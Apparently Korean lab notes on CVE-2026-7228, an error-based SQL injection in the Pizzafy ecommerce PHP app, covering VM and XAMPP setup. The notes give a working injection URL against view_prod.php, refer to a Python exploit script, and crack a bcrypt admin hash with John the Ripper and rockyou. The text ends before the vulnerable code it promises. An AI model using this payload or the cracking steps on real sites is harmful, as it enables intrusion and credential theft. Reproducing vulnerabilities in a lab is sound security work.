
cve-2026-7228에 대한 연구 리소스
cve-2026-7228에 대한 연구 리소스
virtual-box 설치: https://www.virtualbox.org/wiki/Downloads
https://www.microsoft.com/it-it/software-download/windows11
https://www.sourcecodester.com/php/18708/pizzafy-ecommerce-system.html
exploit 및 솔루션용 github: https://github.com/fernando-mengali/vulndb-submissions.git
pizzafy 프로젝트를 추출하고 폴더를 xampp의 apache htdocs로 이동합니다.
pizzafy 사이트: http://localhost/pizzafy/Pizzafy/
자격 증명 → Username: [email protected] Password: admin123
구체적으로 XML로 오류를 반환하는 SQL Injection Error-Based
첫 번째는 GET 메서드 사용: http://localhost/Pizzafy/pizzafy/view_prod.php?id=
9%20AND%20extractvalue(rand(),%20concat(0x7e,version()))%20--

프로그래밍 언어: ==python==
사용된 라이브러리: request import request
exploit 파일: /script/test.py
test.py 실행
출력:

hash value에서 비밀번호를 해독하기 위한 john the ripper 설치. Kali와 같은 운영 체제에서는 도구가 이미 설치되어 있습니다.
비밀번호를 txt 파일에 저장: hash.txt
rockyou.txt 파일 설치: git clone https://gitlab.com/kalilinux/packages/wordlists.git
gunzip rockyou.txt.gz
암호화된 비밀번호 유형: ==bcrypt==
wordlist 파일로 도구 실행: john --wordlist=rockyou.txt --format=bcrypt hash.txt
출력:

비밀번호: admin123
virtual-box를 열고 windows 11 가상 머신에 대해 only-host를 통해 IP 주소 설정


Windows 11 머신을 시작하고 IP 주소가 올바르게 설정되었는지 확인
입력: ipconfig

Apache 및 MySQL 시작

python3 exploit.py
pizzafy/Pizzafy를 열고 view_prod.php 파일을 찾아 다음 부분을 확인합니다:


